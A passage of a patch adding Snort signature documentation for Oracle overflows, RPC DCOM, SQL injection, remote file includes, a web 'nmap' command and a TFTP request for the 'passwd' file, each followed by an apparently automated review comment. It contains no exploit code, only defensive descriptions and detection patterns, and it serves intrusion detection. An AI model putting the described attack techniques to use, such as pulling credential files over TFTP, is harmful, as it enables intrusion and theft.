+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_load
+. This procedure is included in
+dbms_offline_snapshot.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
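Review bot: Ease of Attack ("Simple.") and Attack Scenarios do not state whether the attacker must already be logged in to the database, whereas 2628.txt in this same patch, describing another Oracle procedure overflow, says "This attack requires an attacker to logon to the database with a valid username and password combination."; the precondition should be stated here too, since it changes the severity considerably. The procedure name is again split by a stray line break ("vulnerability in the procedure begin_load" / ". This procedure is included in" / "dbms_offline_snapshot."), "Oracle Oracle9i" doubles the vendor name, and "Additional References:" is empty.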
--- /dev/null
+++ b/doc/signatures/563.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+563
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
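Review bot: The reference "OpenNap Specification http://opennap.sourceforge.net/napster.txt" under "Additional References:" has no connection to anything in the text, which describes a generic attack-response signature ("Events generated by rules in attack-responses.rules may indicate that an attack against a host has been sucessful."); it appears to have been carried over from a P2P document and should be removed or replaced with what this Sid actually matches. The document also never says which response string the rule looks for, without which "False Positives: None known." cannot be assessed. Spelling: "sucessful" (three occurrences) should be "successful".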
--- /dev/null
+++ b/doc/signatures/483.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+483
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running CyberKit 2.2 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running CyberKit 2.2 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS154
+
+--
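Review bot: "Corrective Action: Block inbound ICMP echo requests." conflicts with the document's own False Positives note that echo requests are used "to legimately troubleshoot networking problems"; suggest qualifying it (block or rate-limit at the perimeter, and treat an internal source as a host to check for CyberKit rather than as something to block). Typos and formatting: "legimately" should be "legitimately", "Steven Alexander<alexander.s@mccd.edu>" is missing a space, and the reference "http://www.whitehats.com/info/IDS154" lacks the "Arachnids:" label the other documents use.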
--- /dev/null
+++ b/doc/signatures/615.txt
@@ -0,0 +1,94 @@
+Rule:  
+
+--
+
+Sid:
+
+615
+
+--
+
+Summary:
+
+An external host has requested to start communications with your host on
+port 1080.
+
+--
+
+Impact:
+
+Network reconnaissance.
+
+--
+
+Detailed Information:
+
+Improperly-configured SOCKS proxies can be abused to allow a hostile
+user to launch attacks and make them appear to come from your site.
+
+Additionally, if the proxy is behind a firewall or is a trusted host, it
+can be used to gain further access into your network and other hosts.
+
+--
+
+Affected Systems:
+
+Any system with a SOCKS proxy server installed.
+
+--
+
+Attack Scenarios:
+
+Attacker utilizes your misconfigured proxy to anonymize their other
+illegitimate activities or gain further access to your network.
+
+--
+
+Ease of Attack:
+
+Trivial or extremely difficult, depending on proxy configuration.
+
+--
+
+False Positives:
+Non-proxy applications running on port 1080, regardless of purpose, will
+trigger this alert every time any session begins.
+
+Ftp clients open a source tcp port greater than 1023 (an 'ephemeral' port).  If the 
+client opens port 1080 for the data connection, this rule will be triggered by return
+packets from the ftp server.  One way to cut down on these false
+positives for this rule might be to preceed it with a pass rule for
+'established' connections to 1080. This would only work with passive ftp
+transactions, where the client initiates both control and data sessions. Normal ftp 
+requires the server to initiate a connection to the client for data transfers after the client 
+sets up a control session.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Allow only internal users to connect to the proxy, or configure strong
+access control.
+
+--
+
+Contributors:
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by jaffeld@duwamish.net
+
+-- 
+
+Additional References:
+
+UnderNet:
+http://help.undernet.org/proxyscan/
+
+
+--
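Review bot: "Impact: Network reconnaissance." understates what Detailed Information describes (launching attacks that "appear to come from your site" and using the proxy "to gain further access into your network"); the Impact line should cover laundering and pivoting, not only reconnaissance. The file also uses a different layout from every other document in the patch, with a blank line after each "--" and after each heading ("--" / "" / "Sid:" / "" / "615"), and the False Positives paragraph has lines well over the wrap width with trailing spaces ("Ftp clients open a source tcp port greater than 1023 (an 'ephemeral' port).  If the "); "preceed" should be "precede". The FTP discussion is the most useful part of the document and would be clearer if it said up front that only active-mode data connections remain a problem after the suggested pass rule, which is what its last two sentences imply.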
--- /dev/null
+++ b/doc/signatures/1219.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1219
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
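Review bot: This is the PHP template from 2565.txt with "PHP" replaced by "CGI"; it does not identify the CGI script or request component rule 1219 matches ("a known vulnerability in a CGI web application running on a server"), so the event cannot be triaged from the documentation alone. Suggest naming the script and adding a reference under the empty "Additional References:". The carried-over typos ("running ona web server", "attackers choosing") and the over-long line "relationships between the victim server and other hosts can be exploited by the attacker." should also be fixed.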
--- /dev/null
+++ b/doc/signatures/2809.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2809
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_mview_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
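Review bot: The stray line break before the period again separates the procedure name from its sentence ("vulnerability in the procedure unregister_mview_repgroup" / ". This procedure is included in" / "dbms_repcat."), and "Oracle Oracle9i" repeats the vendor name; both look like unfilled-template artifacts that recur across the Oracle documents in this patch and should be fixed at the template. As with the other Oracle entries, "Additional References:" is empty and the authentication precondition is not stated.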
--- /dev/null
+++ b/doc/signatures/3173.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3173
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
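Review bot: The Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") does not describe the vulnerability in Detailed Information, which is triggered by "sending malformed data via RPC" to a DCOM port; it appears to be copied from an SMB document and should be rewritten around a malformed RPC request. "Additional References:" is empty although 2191.txt in this same patch, which documents the same vulnerability text, cites MS03-026 and CAN-2003-0352; those references should be reused here. Typo: "Expoit code exists."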
--- /dev/null
+++ b/doc/signatures/2191.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2191
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+--
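Review bot: the Impact section lists only "Denial of Service (DoS)", but Detailed Information states the malformed RPC request yields a buffer overflow that lets the attacker "execute arbitrary code with the privileges of the local system account"; Impact should be upgraded to something like "Serious. Execution of arbitrary code as the local system account. Denial of Service (DoS) is also possible." The Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not describe the malformed DCOM request explained in Detailed Information and appears to have been copied from a different document; it should describe a crafted DCOM activation request sent to an RPC port. "Expoit" in Ease of Attack should be "Exploit".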
--- /dev/null
+++ b/doc/signatures/3111.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3111
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
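Review bot: the stray blank line between "--" and "Corrective Action:" and the trailing spaces on several "-- " separator lines break the consistent section layout the other documents in this patch use; remove them. Additional References is empty even though the Summary calls this a known vulnerability and Corrective Action points to vendor supplied patches; the vendor bulletin and CVE entry should be cited the way 2191.txt does, so an analyst can confirm which patch closes the unchecked buffer in message length handling.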
--- /dev/null
+++ b/doc/signatures/2407.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2407
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering  and system integrity compromise. This rule generates 
+an event on a request for the util.pl file, part of the CalaCode @mail 
+Webmail system.  Some versions of this software are vulnerable to a cross 
+site scripting attack.
+
+--
+Detailed Information:
+When accessing the webmail service of @mail, a
+cross site scripting bug can be abused in the util.pl file.  When
+addressing the "settings" bar, Javascript code can be inserted into the
+"Displayed Name" field.
+
+This rule will also trigger on some scripted HTTP vulnerability
+scans.  Many vulnerability assessment tools include a check which will
+verify whether the util.pl file is available on a web server.  There are
+multiple other known vulnerabilities in version 3.64 of the @mail system,
+and the existance of this file would reveal its presence.
+
+--
+Affected Systems:
+	@mail version 3.64 and prior
+
+--
+Attack Scenarios:
+A user can submit malicious Javascript to the "Displayed
+Name" field.  As usual with most browsers, this script will be executed
+within the security context of the web site.  The session ID of the
+connection, which is available from within this security context, can be
+abused by the attacker to obtain access to the session and the user's e-mail account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck, GCIA <maarten@daemon.be>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
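Review bot: the Impact section contains the description of what the rule matches ("a request for the util.pl file, part of the CalaCode @mail Webmail system") while Detailed Information describes the cross site scripting bug; move the match description into Detailed Information and keep Impact to consequences, as the other documents do. "existance" should be "existence", and the double spaces after sentences should be single. Additional References is empty although a specific product version (@mail 3.64) is named; cite the advisory for the "Displayed Name" cross site scripting issue so the version claim can be verified.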
--- /dev/null
+++ b/doc/signatures/100000851.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000851
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "language" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
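Review bot: the third paragraph of Detailed Information (credential validation of "a client host connecting to the services offered on a host server") is generic boilerplate that does not describe a remote file include via the "language" parameter of include.php and should be replaced with what the rule actually matches (a remote URL supplied as the parameter value). "an exploitation attempt has been attempted" should read "an exploitation attempt has been made", "ona" should be "on a", and "attackers choosing" needs an apostrophe. The Sid and Affected Systems blocks lack the blank line before "--" used elsewhere. Since the text itself identifies inclusion of "a file from a remote machine" as the problem, Corrective Action could also recommend disabling remote URL includes in the PHP configuration, not only patching.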
--- /dev/null
+++ b/doc/signatures/380.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+380
+
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running "Seer" software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running "Seer" software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS166
+
+--
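Review bot: the "--" separator between the Sid block and "Summary:" is missing, unlike every other document in the patch. "legimately" should be "legitimately". Corrective Action ("Block inbound ICMP echo requests") is at odds with the False Positives note that echo requests are used for legitimate troubleshooting; qualify it as blocking echo requests from external or untrusted networks, which matches the "Information gathering" impact described.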
--- /dev/null
+++ b/doc/signatures/1361.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+1361
+
+-- 
+Summary:
+A web command execution attack involving the use of a
+"nmap" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity.
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "nmap" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "nmap" command may be used to discover open ports, services and operating system information on hosts.
+
+The rule looks for the "nmap" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "nmap" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "nmap" command to probe other hosts for further exploitation.
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+Any string containing 'nmap' followed by space in the URL will trigger the alarm.
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
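Review bot: "attempted to trick the web server into executing system in non-interactive mode" is missing its object and should read "executing system commands". The document has no Affected Systems section, which every other document in this patch carries; "All systems using a web server." would be consistent with 1184.txt. Also "outside of it's designated web root" should be "its", "none known" should match the "None known." capitalization used elsewhere, the Summary and "Simple. No exploit software required" lack full stops, and "Webservers" should be "Web servers".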
--- /dev/null
+++ b/doc/signatures/100000859.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000859
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "hidemail" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "hidemail" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
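Review bot: the third paragraph of Detailed Information is credential-validation boilerplate unrelated to SQL injection via the "hidemail" parameter of class.php and should be dropped. The Impact claim of "execution of arbitrary code" is not supported by the text for an SQL injection; the second paragraph mentions executing "system binaries" without explaining how the database backend would permit that, so either explain it or qualify the claim. "ona" should be "on a", "attackers choosing" needs an apostrophe, "an exploitation attempt has been attempted" is redundant, and the Sid and Affected Systems blocks lack the blank line before "--". Corrective Action should also recommend validating or parameterizing the input, since Attack Scenarios itself names unsanitized user input as the root cause.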
--- /dev/null
+++ b/doc/signatures/100000766.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000766
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Blog CMS" application running on a webserver. Access to the file "thumb.php" using a remote file being passed as the "gallery" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "gallery" parameter in the "thumb.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
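Review bot: the credential-validation paragraph in Detailed Information does not describe a remote file include via the "gallery" parameter of thumb.php and should be removed in favour of stating what the rule matches (a remote URL in that parameter). "ona" should be "on a", "attackers choosing" needs an apostrophe, "an exploitation attempt has been attempted" is redundant, and the Sid and Affected Systems blocks lack the blank line before "--". Ease of Attack states "Exploits exist" but Additional References is empty; cite the advisory the rule was derived from.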
--- /dev/null
+++ b/doc/signatures/1443.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1443
+
+--
+Summary:
+This event is generated when a TFTP GET request is made for the "passwd"
+file.  This could be an indication that a remote attacker has 
+compromised a system on the network and is transfering sensitive files 
+back to the attacking system.  It may also be an indication of a generic
+TFTP server scan that includes tests for generic system files.
+
+--
+Impact:
+The "passwd" file normally stores users names for Unix based systems.  
+If this file is being transfered over the network using TFTP it is 
+normally an indication of a system compromise.
+
+In some situations this rule may only indicate a generic TFTP scan 
+attempt, as the attacker may be scanning a large range of IP addresses 
+for TFTP improperly configured TFTP servers.
+
+--
+Detailed Information:
+This rule searches for the filename "passwd" in TFTP GET requests.  The 
+"passwd" file is used by Unix based systems to store users names for the
+system.
+
+--
+Attack Scenarios:
+After a successful system compromise an attacker may setup a tftp 
+service to transfer files back to the attacking system.  Under this 
+scenario the source address will point to the attack network and the 
+destination address will be an address defined in the HOME_NET.
+
+Attackers may also scan large subnets for TFTP servers and make numerous
+generic GET request for common system files. 
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large 
+subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+This rule was created to catch TFTP GET requests for "passwd", if this 
+file name is being used during a legitimate TFTP session this rule will 
+generate a false positive.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Depending on the situation blocking the attacker at the upstream router 
+or firewall will eliminate the problem.  However, if the TFTP server is 
+incorrectly configured and is actually serving the "passwd" file, it 
+should be configured to only serve specific files from a safe directory.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+Additional References
+
+--
